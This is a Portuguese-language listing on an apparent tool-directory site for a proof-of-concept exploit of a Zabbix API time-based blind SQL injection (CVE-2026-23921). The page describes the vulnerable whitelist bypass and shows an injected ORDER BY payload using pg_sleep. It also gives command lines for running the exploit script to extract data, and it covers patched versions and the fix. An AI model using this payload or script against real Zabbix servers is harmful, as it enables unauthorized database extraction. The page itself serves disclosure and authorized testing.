Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23921 — Proof-of-concept de exploit para CVE-2026-23921, uma injeção SQL cega baseada em tempo na API do Zabbix através do parâmetro sortfield, permitindo a extração de dados de backends PostgreSQL e MySQL. | Kitploit
Ferramentas/GitHubGitHub/qucklecrabik/cve-2026-23921
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubqucklecrabik/cve-2026-23921

CVE-2026-23921

Proof-of-concept de exploit para CVE-2026-23921, uma injeção SQL cega baseada em tempo na API do Zabbix através do parâmetro sortfield, permitindo a extração de dados de backends PostgreSQL e MySQL.

Ver Repositório
9há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23921 — Injeção SQL Cega Baseada em Tempo no Zabbix

Versões afetadas: Zabbix < 7.0.22 / < 7.2.15 / < 7.4.6
CVSS: Alto
Tipo: Injeção SQL cega baseada em tempo através do parâmetro sortfield
Autenticação necessária: Sim (qualquer usuário da API; Super Admin evita joins de permissão)

Vulnerabilidade

Os serviços legados da API do Zabbix (host.get, trigger.get, item.get, etc.) aceitam um parâmetro groupBy não declarado através de zbx_array_merge(). Em CApiService::applyQuerySortOptions(), o array groupBy substitui a whitelist codificada usada para validar . Um atacante passa o mesmo payload SQL tanto em quanto em — a validação passa contra a lista controlada pelo atacante, e o payload chega ao sem escape.

sortfield
groupBy
sortfield
ORDER BY

Fluxo do ataque

  1. O atacante envia groupBy: ["hostid,(SELECT IF(...))--"] e sortfield: "hostid,(SELECT IF(...))--" com countOutput: true
  2. zbx_array_merge preserva a chave groupBy não declarada
  3. applyQuerySortOptions constrói a whitelist a partir de groupBy → a validação passa
  4. applyQuerySortField concatena o payload no ORDER BY
  5. createSelectQueryFromParts constrói o SQL final sem escape

SQL resultante (PostgreSQL)

root@kitploit:~
SELECT COUNT(*) AS rowscount
FROM hosts h
WHERE h.flags IN (0,4)
ORDER BY h.hostid,(SELECT CASE WHEN ascii(substring(version() FROM 1 FOR 1))>50
                   THEN pg_sleep(3) ELSE pg_sleep(0) END)--

Uso

root@kitploit:~
# PostgreSQL backend (default)
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db pgsql

# MySQL backend
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db mysql

# Existing auth token
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --auth <token> --db pgsql

# Extract arbitrary expression
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db pgsql \
    --expr "current_user"

# Use a different API method
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db mysql \
    --method trigger.get --sort-col triggerid

Correção

Atualize para Zabbix 7.0.22 / 7.2.15 / 7.4.6 ou posterior.

O patch substitui array_merge($options['groupBy'], ...) por array_intersect($this->sortColumns, $options['groupBy']) para que valores fornecidos pelo atacante nunca entrem na whitelist. Verificações de tipo adicionais is_string() e is_array() foram adicionadas como defesa em profundidade.

Aviso legal

Esta ferramenta é destinada apenas a testes de segurança autorizados e fins educacionais. Use-a somente contra sistemas que você possui ou para os quais tem permissão escrita explícita de testar.

Baixar ferramenta